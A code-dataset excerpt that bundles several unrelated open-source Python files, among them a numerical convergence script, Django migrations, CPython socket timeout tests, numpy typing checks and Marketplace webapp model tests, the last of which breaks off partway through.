code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
|---|---|---|---|---|---|
"""
Computes the observed order of convergence for the velocity components and the
pressure using the solution on 4 consistently refined grids.
"""
import os
import numpy
import h5py
import pprint
def read_fields_from_hdf5(filepath, gridpath, names=[]):
fields = {}
f = h5py.File(filepath, 'r')
fg = h5py.File(gridpath, 'r')
for name in names:
x, y = fg[name]['x'][:], fg[name]['y'][:]
values = f[name][:]
fields[name] = {'values': values, 'grid': {'x': x, 'y': y}}
return fields
def restrict_field(field, grid, atol=1.0E-12):
def intersection(a, b, atol=atol):
return numpy.any(numpy.abs(a - b[:, numpy.newaxis]) <= atol, axis=0)
values, x, y = field['values'], field['grid']['x'], field['grid']['y']
mask_x = intersection(x, grid['x'], atol=atol)
mask_y = intersection(y, grid['y'], atol=atol)
return {'grid': {'x': x[mask_x], 'y': y[mask_y]},
'values': numpy.array([values[j][mask_x]
for j in range(y.size) if mask_y[j]])}
script_dir = os.path.dirname(os.path.realpath(__file__))
root_dir = os.path.dirname(script_dir)
timestep = 500
ncells = [20, 60, 180, 540]
folders = [str(n) for n in ncells]
ratio = 3.0
fields = {}
field_names = ['u', 'v', 'p']
for folder in folders:
directory = os.path.join(root_dir, folder)
filepath = os.path.join(directory, 'solution', '{:0>7}.h5'.format(timestep))
gridpath = os.path.join(directory, 'grid.h5')
fields[folder] = read_fields_from_hdf5(filepath, gridpath, names=field_names)
# Restrict fields onto coarse grid.
for name in field_names:
fields[folder][name] = restrict_field(fields[folder][name],
fields[folders[0]][name]['grid'])
# Computes observed orders of convergence.
alpha = {'first': {}, 'last': {}}
# Using the first three grids.
coarse = fields[folders[0]]
medium = fields[folders[1]]
fine = fields[folders[2]]
for name in field_names:
alpha['first'][name] = (numpy.log(numpy.linalg.norm(medium[name]['values'] -
coarse[name]['values'],
ord=None) /
numpy.linalg.norm(fine[name]['values'] -
medium[name]['values'],
ord=None)) /
numpy.log(ratio))
# Using the last three grids.
coarse = fields[folders[1]]
medium = fields[folders[2]]
fine = fields[folders[3]]
for name in field_names:
alpha['last'][name] = (numpy.log(numpy.linalg.norm(medium[name]['values'] -
coarse[name]['values'],
ord=None) /
numpy.linalg.norm(fine[name]['values'] -
medium[name]['values'],
ord=None)) /
numpy.log(ratio))
pprint.pprint(alpha)
|
mesnardo/PetIBM
|
examples/navierstokes/convergence/liddrivencavity2dRe100_20/scripts/getOrderConvergence.py
|
Python
|
bsd-3-clause
| 3,069
|
# Generated by Django 2.2.6 on 2020-03-02 00:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('logs', '0003_logentry_username'),
]
operations = [
migrations.AlterField(
model_name='logentry',
name='timestamp',
field=models.DateTimeField(blank=True, null=True, verbose_name='timestamp'),
),
]
|
bmun/huxley
|
huxley/logging/migrations/0004_auto_20200302_0046.py
|
Python
|
bsd-3-clause
| 425
|
#!/usr/bin/python
#-*- coding: UTF-8 -*-
# __init__.py: Defines the module for musictheory.
#
# Copyright (c) 2008-2020 Peter Murphy <peterkmurphy@gmail.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * The names of its contributors may not be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE CONTRIBUTORS ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
__all__ = ["musutility", "temperament", "scales", "chords"];
__author__ = "Peter Murphy (peterkmurphy@gmail.com)"
__version__ = "0.6"
__copyright__ = "Copyright (c) 2008-2020 Peter Murphy"
__license__ = "BSD (3 clause)"
__package__ = "musictheory"
|
peterkmurphy/musictheory
|
musictheory/__init__.py
|
Python
|
bsd-3-clause
| 1,864
|
from .version import version as __version__ # noqa
from .sda_file import SDAFile
|
enthought/sandia-data-archive
|
sdafile/__init__.py
|
Python
|
bsd-3-clause
| 84
|
import random
import uuid
from datetime import date, timedelta
from django.test import TestCase
from corehq.apps.accounting.models import (
BillingAccount,
DefaultProductPlan,
SoftwarePlanEdition,
Subscription,
SubscriptionAdjustmentMethod,
)
from corehq.apps.accounting.utils.subscription import ensure_community_or_paused_subscription
from corehq.apps.domain.models import Domain
class TestExplicitUnpaidSubscriptions(TestCase):
domain = None
from_date = None
@classmethod
def setUpClass(cls):
super(TestExplicitUnpaidSubscriptions, cls).setUpClass()
cls.domain = Domain(name=str(uuid.uuid4()))
cls.domain.save()
cls.from_date = date.today()
@classmethod
def tearDownClass(cls):
cls.domain.delete()
super(TestExplicitUnpaidSubscriptions, cls).tearDownClass()
def test_no_preexisting_subscription(self):
self._assign_unpaid_subscriptions()
self.assertEqual(Subscription.visible_objects.count(), 1)
subscription = Subscription.visible_objects.all()[0]
self.assertEqual(subscription.subscriber.domain, self.domain.name)
self.assertEqual(subscription.date_start, self.from_date)
self.assertIsNone(subscription.date_end)
self.assertEqual(subscription.plan_version, self._most_recently_created_community_plan_version)
self.assertTrue(subscription.skip_invoicing_if_no_feature_charges)
def test_preexisting_current_subscription(self):
preexisting_subscription = Subscription.new_domain_subscription(
self._preexisting_subscription_account,
self.domain.name,
self._random_plan_version,
)
self._assign_unpaid_subscriptions()
self.assertEqual(Subscription.visible_objects.count(), 1)
self.assertFalse(Subscription.visible_objects.exclude(subscriber__domain=self.domain.name).exists())
self.assertEqual(Subscription.visible_objects.all()[0], preexisting_subscription)
def test_preexisting_future_subscription(self):
future_subscription_start_date = self.from_date + timedelta(days=10)
plan_version = self._random_plan_version
Subscription.new_domain_subscription(
self._preexisting_subscription_account,
self.domain.name,
plan_version,
date_start=future_subscription_start_date,
)
self._assign_unpaid_subscriptions()
self.assertEqual(Subscription.visible_objects.count(), 2)
self.assertFalse(Subscription.visible_objects.exclude(subscriber__domain=self.domain.name).exists())
self.assertIsNotNone(Subscription.visible_objects.get(
date_start=self.from_date,
date_end=future_subscription_start_date,
plan_version=self._most_recently_created_paused_plan_version,
skip_invoicing_if_no_feature_charges=True,
))
self.assertIsNotNone(Subscription.visible_objects.get(
date_start=future_subscription_start_date,
plan_version=plan_version,
))
def test_preexisting_past_subscription(self):
past_subscription_end_date = self.from_date - timedelta(days=10)
past_subscription_start_date = past_subscription_end_date - timedelta(days=5)
plan_version = self._random_plan_version
Subscription.new_domain_subscription(
self._preexisting_subscription_account,
self.domain.name,
plan_version,
date_start=past_subscription_start_date,
date_end=past_subscription_end_date,
)
self._assign_unpaid_subscriptions()
self.assertEqual(Subscription.visible_objects.count(), 2)
self.assertFalse(Subscription.visible_objects.exclude(subscriber__domain=self.domain.name).exists())
self.assertIsNotNone(Subscription.visible_objects.get(
date_start=self.from_date,
date_end=None,
plan_version=self._most_recently_created_paused_plan_version,
skip_invoicing_if_no_feature_charges=True,
))
self.assertIsNotNone(Subscription.visible_objects.get(
date_start=past_subscription_start_date,
date_end=past_subscription_end_date,
plan_version=plan_version,
))
def _assign_unpaid_subscriptions(self):
ensure_community_or_paused_subscription(
self.domain.name, self.from_date, SubscriptionAdjustmentMethod.DEFAULT_COMMUNITY
)
@property
def _most_recently_created_community_plan_version(self):
return DefaultProductPlan.get_default_plan_version(edition=SoftwarePlanEdition.COMMUNITY)
@property
def _most_recently_created_paused_plan_version(self):
return DefaultProductPlan.get_default_plan_version(edition=SoftwarePlanEdition.PAUSED)
@property
def _random_plan_version(self):
return DefaultProductPlan.get_default_plan_version(
edition=random.choice(SoftwarePlanEdition.SELF_SERVICE_ORDER[2:] + [SoftwarePlanEdition.ENTERPRISE]),
)
@property
def _preexisting_subscription_account(self):
return BillingAccount.get_or_create_account_by_domain(self.domain.name, created_by=self.domain.name)[0]
|
dimagi/commcare-hq
|
corehq/apps/accounting/tests/test_migrations.py
|
Python
|
bsd-3-clause
| 5,282
|
# flake8: noqa
"""
namespace for quantecon.tests
@author : Spencer Lyon
@date : 2014-08-01 13:13:59
"""
from . util import capture, get_data_dir, max_abs_diff
|
QuantEcon/QuantEcon.py
|
quantecon/tests/__init__.py
|
Python
|
bsd-3-clause
| 161
|
"""Unit tests for socket timeout feature."""
import functools
import unittest
from test import support
from test.support import socket_helper
# This requires the 'network' resource as given on the regrtest command line.
skip_expected = not support.is_resource_enabled('network')
import time
import errno
import socket
@functools.lru_cache()
def resolve_address(host, port):
"""Resolve an (host, port) to an address.
We must perform name resolution before timeout tests, otherwise it will be
performed by connect().
"""
with socket_helper.transient_internet(host):
return socket.getaddrinfo(host, port, socket.AF_INET,
socket.SOCK_STREAM)[0][4]
class CreationTestCase(unittest.TestCase):
"""Test case for socket.gettimeout() and socket.settimeout()"""
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def testObjectCreation(self):
# Test Socket creation
self.assertEqual(self.sock.gettimeout(), None,
"timeout not disabled by default")
def testFloatReturnValue(self):
# Test return value of gettimeout()
self.sock.settimeout(7.345)
self.assertEqual(self.sock.gettimeout(), 7.345)
self.sock.settimeout(3)
self.assertEqual(self.sock.gettimeout(), 3)
self.sock.settimeout(None)
self.assertEqual(self.sock.gettimeout(), None)
def testReturnType(self):
# Test return type of gettimeout()
self.sock.settimeout(1)
self.assertEqual(type(self.sock.gettimeout()), type(1.0))
self.sock.settimeout(3.9)
self.assertEqual(type(self.sock.gettimeout()), type(1.0))
def testTypeCheck(self):
# Test type checking by settimeout()
self.sock.settimeout(0)
self.sock.settimeout(0)
self.sock.settimeout(0.0)
self.sock.settimeout(None)
self.assertRaises(TypeError, self.sock.settimeout, "")
self.assertRaises(TypeError, self.sock.settimeout, "")
self.assertRaises(TypeError, self.sock.settimeout, ())
self.assertRaises(TypeError, self.sock.settimeout, [])
self.assertRaises(TypeError, self.sock.settimeout, {})
self.assertRaises(TypeError, self.sock.settimeout, 0j)
def testRangeCheck(self):
# Test range checking by settimeout()
self.assertRaises(ValueError, self.sock.settimeout, -1)
self.assertRaises(ValueError, self.sock.settimeout, -1)
self.assertRaises(ValueError, self.sock.settimeout, -1.0)
def testTimeoutThenBlocking(self):
# Test settimeout() followed by setblocking()
self.sock.settimeout(10)
self.sock.setblocking(True)
self.assertEqual(self.sock.gettimeout(), None)
self.sock.setblocking(False)
self.assertEqual(self.sock.gettimeout(), 0.0)
self.sock.settimeout(10)
self.sock.setblocking(False)
self.assertEqual(self.sock.gettimeout(), 0.0)
self.sock.setblocking(True)
self.assertEqual(self.sock.gettimeout(), None)
def testBlockingThenTimeout(self):
# Test setblocking() followed by settimeout()
self.sock.setblocking(False)
self.sock.settimeout(1)
self.assertEqual(self.sock.gettimeout(), 1)
self.sock.setblocking(True)
self.sock.settimeout(1)
self.assertEqual(self.sock.gettimeout(), 1)
class TimeoutTestCase(unittest.TestCase):
# There are a number of tests here trying to make sure that an operation
# doesn't take too much longer than expected. But competing machine
# activity makes it inevitable that such tests will fail at times.
# When fuzz was at 1.0, I (tim) routinely saw bogus failures on Win2K
# and Win98SE. Boosting it to 2.0 helped a lot, but isn't a real
# solution.
fuzz = 2.0
localhost = socket_helper.HOST
def setUp(self):
raise NotImplementedError()
tearDown = setUp
def _sock_operation(self, count, timeout, method, *args):
"""
Test the specified socket method.
The method is run at most `count` times and must raise a TimeoutError
within `timeout` + self.fuzz seconds.
"""
self.sock.settimeout(timeout)
method = getattr(self.sock, method)
for i in range(count):
t1 = time.monotonic()
try:
method(*args)
except TimeoutError as e:
delta = time.monotonic() - t1
break
else:
self.fail('TimeoutError was not raised')
# These checks should account for timing unprecision
self.assertLess(delta, timeout + self.fuzz)
self.assertGreater(delta, timeout - 1.0)
class TCPTimeoutTestCase(TimeoutTestCase):
"""TCP test case for socket.socket() timeout functions"""
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addr_remote = resolve_address('www.python.org.', 80)
def tearDown(self):
self.sock.close()
@unittest.skipIf(True, 'need to replace these hosts; see bpo-35518')
def testConnectTimeout(self):
# Testing connect timeout is tricky: we need to have IP connectivity
# to a host that silently drops our packets. We can't simulate this
# from Python because it's a function of the underlying TCP/IP stack.
# So, the following Snakebite host has been defined:
blackhole = resolve_address('blackhole.snakebite.net', 56666)
# Blackhole has been configured to silently drop any incoming packets.
# No RSTs (for TCP) or ICMP UNREACH (for UDP/ICMP) will be sent back
# to hosts that attempt to connect to this address: which is exactly
# what we need to confidently test connect timeout.
# However, we want to prevent false positives. It's not unreasonable
# to expect certain hosts may not be able to reach the blackhole, due
# to firewalling or general network configuration. In order to improve
# our confidence in testing the blackhole, a corresponding 'whitehole'
# has also been set up using one port higher:
whitehole = resolve_address('whitehole.snakebite.net', 56667)
# This address has been configured to immediately drop any incoming
# packets as well, but it does it respectfully with regards to the
# incoming protocol. RSTs are sent for TCP packets, and ICMP UNREACH
# is sent for UDP/ICMP packets. This means our attempts to connect to
# it should be met immediately with ECONNREFUSED. The test case has
# been structured around this premise: if we get an ECONNREFUSED from
# the whitehole, we proceed with testing connect timeout against the
# blackhole. If we don't, we skip the test (with a message about not
# getting the required RST from the whitehole within the required
# timeframe).
# For the records, the whitehole/blackhole configuration has been set
# up using the 'pf' firewall (available on BSDs), using the following:
#
# ext_if="bge0"
#
# blackhole_ip="35.8.247.6"
# whitehole_ip="35.8.247.6"
# blackhole_port="56666"
# whitehole_port="56667"
#
# block return in log quick on $ext_if proto { tcp udp } \
# from any to $whitehole_ip port $whitehole_port
# block drop in log quick on $ext_if proto { tcp udp } \
# from any to $blackhole_ip port $blackhole_port
#
skip = True
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
timeout = support.LOOPBACK_TIMEOUT
sock.settimeout(timeout)
try:
sock.connect((whitehole))
except TimeoutError:
pass
except OSError as err:
if err.errno == errno.ECONNREFUSED:
skip = False
finally:
sock.close()
del sock
if skip:
self.skipTest(
"We didn't receive a connection reset (RST) packet from "
"{}:{} within {} seconds, so we're unable to test connect "
"timeout against the corresponding {}:{} (which is "
"configured to silently drop packets)."
.format(
whitehole[0],
whitehole[1],
timeout,
blackhole[0],
blackhole[1],
)
)
# All that hard work just to test if connect times out in 0.001s ;-)
self.addr_remote = blackhole
with socket_helper.transient_internet(self.addr_remote[0]):
self._sock_operation(1, 0.001, 'connect', self.addr_remote)
def testRecvTimeout(self):
# Test recv() timeout
with socket_helper.transient_internet(self.addr_remote[0]):
self.sock.connect(self.addr_remote)
self._sock_operation(1, 1.5, 'recv', 1024)
def testAcceptTimeout(self):
# Test accept() timeout
socket_helper.bind_port(self.sock, self.localhost)
self.sock.listen()
self._sock_operation(1, 1.5, 'accept')
def testSend(self):
# Test send() timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as serv:
socket_helper.bind_port(serv, self.localhost)
serv.listen()
self.sock.connect(serv.getsockname())
# Send a lot of data in order to bypass buffering in the TCP stack.
self._sock_operation(100, 1.5, 'send', b"X" * 200000)
def testSendto(self):
# Test sendto() timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as serv:
socket_helper.bind_port(serv, self.localhost)
serv.listen()
self.sock.connect(serv.getsockname())
# The address argument is ignored since we already connected.
self._sock_operation(100, 1.5, 'sendto', b"X" * 200000,
serv.getsockname())
def testSendall(self):
# Test sendall() timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as serv:
socket_helper.bind_port(serv, self.localhost)
serv.listen()
self.sock.connect(serv.getsockname())
# Send a lot of data in order to bypass buffering in the TCP stack.
self._sock_operation(100, 1.5, 'sendall', b"X" * 200000)
class UDPTimeoutTestCase(TimeoutTestCase):
"""UDP test case for socket.socket() timeout functions"""
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def tearDown(self):
self.sock.close()
def testRecvfromTimeout(self):
# Test recvfrom() timeout
# Prevent "Address already in use" socket exceptions
socket_helper.bind_port(self.sock, self.localhost)
self._sock_operation(1, 1.5, 'recvfrom', 1024)
def test_main():
support.requires('network')
support.run_unittest(
CreationTestCase,
TCPTimeoutTestCase,
UDPTimeoutTestCase,
)
if __name__ == "__main__":
test_main()
|
brython-dev/brython
|
www/src/Lib/test/test_timeout.py
|
Python
|
bsd-3-clause
| 11,369
|
from typing import List, Any, Mapping, Tuple, SupportsIndex
import numpy as np
import numpy.typing as npt
def mode_func(
ar: npt.NDArray[np.number[Any]],
width: Tuple[int, int],
iaxis: SupportsIndex,
kwargs: Mapping[str, Any],
) -> None: ...
AR_i8: npt.NDArray[np.int64]
AR_f8: npt.NDArray[np.float64]
AR_LIKE: List[int]
reveal_type(np.pad(AR_i8, (2, 3), "constant")) # E: numpy.ndarray[Any, numpy.dtype[{int64}]]
reveal_type(np.pad(AR_LIKE, (2, 3), "constant")) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.pad(AR_f8, (2, 3), mode_func)) # E: numpy.ndarray[Any, numpy.dtype[{float64}]]
reveal_type(np.pad(AR_f8, (2, 3), mode_func, a=1, b=2)) # E: numpy.ndarray[Any, numpy.dtype[{float64}]]
|
simongibbons/numpy
|
numpy/typing/tests/data/reveal/arraypad.py
|
Python
|
bsd-3-clause
| 728
|
# -*- coding: utf-8 -*-
import functools
import hashlib
import json
import os
import shutil
import unittest
import uuid
import zipfile
from datetime import datetime, timedelta
from django.conf import settings
from django.core import mail
from django.core.files.storage import default_storage as storage
from django.db.models.signals import post_delete, post_save
from django.test.utils import override_settings
from django.utils.translation import ugettext_lazy as _
import mock
from nose.tools import eq_, ok_, raises
import amo
from addons.models import (Addon, AddonCategory, AddonDeviceType,
BlacklistedSlug, Category, Preview, version_changed)
from addons.signals import version_changed as version_changed_signal
from amo.helpers import absolutify
from amo.tests import app_factory, version_factory
from amo.urlresolvers import reverse
from comm.utils import create_comm_thread
from constants.applications import DEVICE_TYPES
from editors.models import EscalationQueue, RereviewQueue
from files.models import File
from files.tests.test_models import UploadTest as BaseUploadTest
from files.utils import WebAppParser
from lib.crypto import packaged
from lib.crypto.tests import mock_sign
from lib.iarc.utils import (
DESC_MAPPING, INTERACTIVES_MAPPING, REVERSE_DESC_MAPPING,
REVERSE_INTERACTIVES_MAPPING)
from market.models import AddonPremium, Price
from users.models import UserProfile
from versions.models import update_status, Version
import mkt
from mkt.constants import apps
from mkt.developers.models import (AddonPaymentAccount, PaymentAccount,
SolitudeSeller)
from mkt.site.fixtures import fixture
from mkt.site.tests import DynamicBoolFieldsTestMixin
from mkt.submit.tests.test_views import BasePackagedAppTest, BaseWebAppTest
from mkt.webapps.models import (AddonExcludedRegion, AppFeatures, AppManifest,
ContentRating, Geodata, get_excluded_in,
IARCInfo, Installed, RatingDescriptors,
RatingInteractives, Webapp, WebappIndexer)
class TestWebapp(amo.tests.TestCase):
fixtures = fixture('prices')
def test_delete_reason(self):
"""Test deleting with a reason gives the reason in the mail."""
reason = u'trêason'
w = Webapp.objects.create(status=amo.STATUS_PUBLIC)
w.name = u'é'
eq_(len(mail.outbox), 0)
w.delete(msg='bye', reason=reason)
eq_(len(mail.outbox), 1)
assert reason in mail.outbox[0].body
def test_soft_deleted(self):
w = Webapp.objects.create(slug='ballin', app_slug='app-ballin',
app_domain='http://omg.org/yes',
status=amo.STATUS_PENDING)
eq_(len(Webapp.objects.all()), 1)
eq_(len(Webapp.with_deleted.all()), 1)
w.delete('boom shakalakalaka')
eq_(len(Webapp.objects.all()), 0)
eq_(len(Webapp.with_deleted.all()), 1)
# When an app is deleted its slugs and domain should get relinquished.
post_mortem = Webapp.with_deleted.filter(id=w.id)
eq_(post_mortem.count(), 1)
for attr in ('slug', 'app_slug', 'app_domain'):
eq_(getattr(post_mortem[0], attr), None)
def test_with_deleted_count(self):
w = Webapp.objects.create(slug='ballin', app_slug='app-ballin',
app_domain='http://omg.org/yes',
status=amo.STATUS_PENDING)
w.delete()
eq_(Webapp.with_deleted.count(), 1)
def test_soft_deleted_valid(self):
w = Webapp.objects.create(status=amo.STATUS_PUBLIC)
Webapp.objects.create(status=amo.STATUS_DELETED)
eq_(list(Webapp.objects.valid()), [w])
eq_(sorted(Webapp.with_deleted.valid()), [w])
def test_webapp_type(self):
webapp = Webapp()
webapp.save()
eq_(webapp.type, amo.ADDON_WEBAPP)
def test_app_slugs_separate_from_addon_slugs(self):
Addon.objects.create(type=1, slug='slug')
webapp = Webapp(app_slug='slug')
webapp.save()
eq_(webapp.slug, 'app-%s' % webapp.id)
eq_(webapp.app_slug, 'slug')
def test_app_slug_collision(self):
Webapp(app_slug='slug').save()
w2 = Webapp(app_slug='slug')
w2.save()
eq_(w2.app_slug, 'slug-1')
w3 = Webapp(app_slug='slug')
w3.save()
eq_(w3.app_slug, 'slug-2')
def test_app_slug_blocklist(self):
BlacklistedSlug.objects.create(name='slug')
w = Webapp(app_slug='slug')
w.save()
eq_(w.app_slug, 'slug~')
def test_geodata_upon_app_creation(self):
app = Webapp.objects.create(type=amo.ADDON_WEBAPP)
assert app.geodata, (
'Geodata was not created with Webapp.')
def test_get_url_path(self):
webapp = Webapp(app_slug='woo')
eq_(webapp.get_url_path(), '/app/woo/')
def test_get_api_url(self):
webapp = Webapp(app_slug='woo', pk=1)
eq_(webapp.get_api_url(), '/api/v1/apps/app/woo/')
def test_get_stats_url(self):
webapp = Webapp(app_slug='woo')
eq_(webapp.get_stats_url(), '/app/woo/statistics/')
url = webapp.get_stats_url(action='installs_series',
args=['day', '20120101', '20120201',
'json'])
eq_(url, '/app/woo/statistics/installs-day-20120101-20120201.json')
def test_get_comm_thread_url(self):
self.create_switch('comm-dashboard')
webapp = app_factory()
eq_(webapp.get_comm_thread_url(), '/comm/')
thread, note = create_comm_thread(
addon=webapp, version=webapp.versions.get(), perms=[],
action='approve', comments='lol',
profile=UserProfile.objects.create(username='lol'))
eq_(webapp.get_comm_thread_url(), '/comm/thread/%s' % thread.id)
def test_get_origin(self):
url = 'http://www.xx.com:4000/randompath/manifest.webapp'
webapp = Webapp(manifest_url=url)
eq_(webapp.origin, 'http://www.xx.com:4000')
def test_get_packaged_origin(self):
webapp = Webapp(app_domain='app://foo.com', is_packaged=True,
manifest_url='')
eq_(webapp.origin, 'app://foo.com')
def test_punicode_domain(self):
webapp = Webapp(app_domain=u'http://www.allizôm.org')
eq_(webapp.punycode_app_domain, 'http://www.xn--allizm-mxa.org')
def test_reviewed(self):
assert not Webapp().is_unreviewed()
def test_cannot_be_purchased(self):
eq_(Webapp(premium_type=True).can_be_purchased(), False)
eq_(Webapp(premium_type=False).can_be_purchased(), False)
def test_can_be_purchased(self):
w = Webapp(status=amo.STATUS_PUBLIC, premium_type=True)
eq_(w.can_be_purchased(), True)
w = Webapp(status=amo.STATUS_PUBLIC, premium_type=False)
eq_(w.can_be_purchased(), False)
def test_get_previews(self):
w = Webapp.objects.create()
eq_(w.get_promo(), None)
p = Preview.objects.create(addon=w, position=0)
eq_(list(w.get_previews()), [p])
p.update(position=-1)
eq_(list(w.get_previews()), [])
def test_get_promo(self):
w = Webapp.objects.create()
eq_(w.get_promo(), None)
p = Preview.objects.create(addon=w, position=0)
eq_(w.get_promo(), None)
p.update(position=-1)
eq_(w.get_promo(), p)
def test_mark_done_pending(self):
w = Webapp()
eq_(w.status, amo.STATUS_NULL)
w.mark_done()
eq_(w.status, amo.WEBAPPS_UNREVIEWED_STATUS)
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_no_icon_in_manifest(self, get_manifest_json):
webapp = Webapp()
get_manifest_json.return_value = {}
eq_(webapp.has_icon_in_manifest(), False)
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_has_icon_in_manifest(self, get_manifest_json):
webapp = Webapp()
get_manifest_json.return_value = {'icons': {}}
eq_(webapp.has_icon_in_manifest(), True)
def test_no_version(self):
webapp = Webapp()
eq_(webapp.get_manifest_json(), None)
eq_(webapp.current_version, None)
def test_has_premium(self):
webapp = Webapp(premium_type=amo.ADDON_PREMIUM)
webapp._premium = mock.Mock()
webapp._premium.price = 1
eq_(webapp.has_premium(), True)
webapp._premium.price = 0
eq_(webapp.has_premium(), True)
def test_get_price_no_premium(self):
webapp = Webapp(premium_type=amo.ADDON_PREMIUM)
eq_(webapp.get_price(), None)
eq_(webapp.get_price_locale(), None)
def test_get_price(self):
webapp = amo.tests.app_factory()
self.make_premium(webapp)
eq_(webapp.get_price(region=mkt.regions.US.id), 1)
def test_get_price_tier(self):
webapp = amo.tests.app_factory()
self.make_premium(webapp)
eq_(str(webapp.get_tier().price), '1.00')
ok_(webapp.get_tier_name())
def test_get_price_tier_no_charge(self):
webapp = amo.tests.app_factory()
self.make_premium(webapp, '0.00')
eq_(str(webapp.get_tier().price), '0.00')
ok_(webapp.get_tier_name())
def test_has_no_premium(self):
webapp = Webapp(premium_type=amo.ADDON_PREMIUM)
webapp._premium = None
eq_(webapp.has_premium(), False)
def test_not_premium(self):
eq_(Webapp().has_premium(), False)
def test_get_region_ids_no_exclusions(self):
# This returns IDs for the *included* regions.
eq_(Webapp().get_region_ids(), mkt.regions.REGION_IDS)
def test_get_region_ids_with_exclusions(self):
w1 = Webapp.objects.create()
w2 = Webapp.objects.create()
AddonExcludedRegion.objects.create(addon=w1, region=mkt.regions.BR.id)
AddonExcludedRegion.objects.create(addon=w1, region=mkt.regions.US.id)
AddonExcludedRegion.objects.create(addon=w2, region=mkt.regions.UK.id)
w1_regions = list(mkt.regions.REGION_IDS)
w1_regions.remove(mkt.regions.BR.id)
w1_regions.remove(mkt.regions.US.id)
w2_regions = list(mkt.regions.REGION_IDS)
w2_regions.remove(mkt.regions.UK.id)
eq_(sorted(Webapp.objects.get(id=w1.id).get_region_ids()),
sorted(w1_regions))
eq_(sorted(Webapp.objects.get(id=w2.id).get_region_ids()),
sorted(w2_regions))
def test_get_regions_no_exclusions(self):
# This returns the class definitions for the *included* regions.
eq_(sorted(Webapp().get_regions()),
sorted(mkt.regions.REGIONS_CHOICES_ID_DICT.values()))
def test_get_regions_with_exclusions(self):
w1 = Webapp.objects.create()
w2 = Webapp.objects.create()
AddonExcludedRegion.objects.create(addon=w1, region=mkt.regions.BR.id)
AddonExcludedRegion.objects.create(addon=w1, region=mkt.regions.US.id)
AddonExcludedRegion.objects.create(addon=w2, region=mkt.regions.UK.id)
all_regions = mkt.regions.REGIONS_CHOICES_ID_DICT.values()
w1_regions = list(all_regions)
w1_regions.remove(mkt.regions.BR)
w1_regions.remove(mkt.regions.US)
w2_regions = list(all_regions)
w2_regions.remove(mkt.regions.UK)
eq_(sorted(Webapp.objects.get(id=w1.id).get_regions()),
sorted(w1_regions))
eq_(sorted(Webapp.objects.get(id=w2.id).get_regions()),
sorted(w2_regions))
def test_package_helpers(self):
app1 = app_factory()
eq_(app1.is_packaged, False)
app2 = app_factory(is_packaged=True)
eq_(app2.is_packaged, True)
def test_package_no_version(self):
webapp = Webapp.objects.create(manifest_url='http://foo.com')
eq_(webapp.is_packaged, False)
def test_assign_uuid(self):
app = Webapp()
eq_(app.guid, None)
app.save()
assert app.guid is not None, (
'Expected app to have a UUID assigned to guid')
@mock.patch.object(uuid, 'uuid4')
def test_assign_uuid_max_tries(self, mock_uuid4):
guid = 'abcdef12-abcd-abcd-abcd-abcdef123456'
mock_uuid4.return_value = uuid.UUID(guid)
# Create another webapp with and set the guid.
Webapp.objects.create(guid=guid)
# Now `assign_uuid()` should fail.
app = Webapp()
with self.assertRaises(ValueError):
app.save()
def test_is_premium_type_upgrade_check(self):
app = Webapp()
ALL = set(amo.ADDON_FREES + amo.ADDON_PREMIUMS)
free_upgrade = ALL - set([amo.ADDON_FREE])
free_inapp_upgrade = ALL - set([amo.ADDON_FREE, amo.ADDON_FREE_INAPP])
# Checking ADDON_FREE changes.
app.premium_type = amo.ADDON_FREE
for pt in ALL:
eq_(app.is_premium_type_upgrade(pt), pt in free_upgrade)
# Checking ADDON_FREE_INAPP changes.
app.premium_type = amo.ADDON_FREE_INAPP
for pt in ALL:
eq_(app.is_premium_type_upgrade(pt), pt in free_inapp_upgrade)
# All else is false.
for pt_old in ALL - set([amo.ADDON_FREE, amo.ADDON_FREE_INAPP]):
app.premium_type = pt_old
for pt_new in ALL:
eq_(app.is_premium_type_upgrade(pt_new), False)
@raises(ValueError)
def test_parse_domain(self):
Webapp(is_packaged=True).parsed_app_domain
def test_app_type_hosted(self):
eq_(Webapp().app_type, 'hosted')
def test_app_type_packaged(self):
eq_(Webapp(is_packaged=True).app_type, 'packaged')
@mock.patch('versions.models.Version.is_privileged', True)
def test_app_type_privileged(self):
# Have to use `app_factory` because we need a `latest_version`
# to make it a privileged version.
eq_(app_factory(is_packaged=True).app_type, 'privileged')
def test_nomination_new(self):
app = app_factory()
app.update(status=amo.STATUS_NULL)
